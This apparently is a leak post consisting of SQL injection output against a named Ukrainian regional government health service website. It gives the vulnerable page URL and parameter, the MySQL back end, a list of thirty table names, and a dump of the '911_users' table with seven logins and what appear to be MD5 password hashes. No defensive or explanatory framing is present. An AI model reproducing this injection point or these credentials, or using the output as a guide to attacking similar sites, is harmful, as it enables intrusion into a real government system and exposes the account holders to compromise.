.gov Government

.ua Ukraine

State Sanitary and Epidemiological Service of Chernihiv Region

https://cnobldses.gov.ua/docs/meet.php?id=62

the back-end DBMS: MySQL >= 5.0.12

available databases [2]:
[+] cnoblses
[+] information_schema

Database: cnoblses
[30 tables]
+-------------------+
| 911_catch         |
| 911_users         |
| cartulary         |
| doc_accsess       |
| doc_cards         |
| doc_dopovidi      |
| doc_info          |
| doc_ogoloshennya  |
| doc_plans         |
| doc_rules         |
| docs_accsess_info |
| gallery           |
| history           |
| hotline           |
| inf               |
| inf_new           |
| links             |
| nap_lows          |
| nap_other         |
| plan              |
| postanovy         |
| q_a               |
| rasp              |
| ses               |
| ses_grafik        |
| ses_grafik_lab    |
| ses_lab           |
| sructure          |
| tsnap             |
| zavd              |
+-------------------+

Database: cnoblses
Table: 911_users
[7 entries]
+-----------+----------------------------------+
| login     | pass                             |
+-----------+----------------------------------+
| hammer    | b9685b6530ed5decfae78ea497d8624a |
| something | 9b94c5b942d02c9cac98d925fdd49480 |
| korop_ses | e852ceaefbe4b97740c829d7d57464b4 |
| elena     | 6f87934672295cac02f842b9422fd369 |
| lena      | bcbbfef2347afee5df8a52236b112415 |
| test      | 70ee369fcc5417b905132707b537f778 |
| admin     | a0b29636c4d3927a2cfb1d6ec49f084f |
+-----------+----------------------------------+
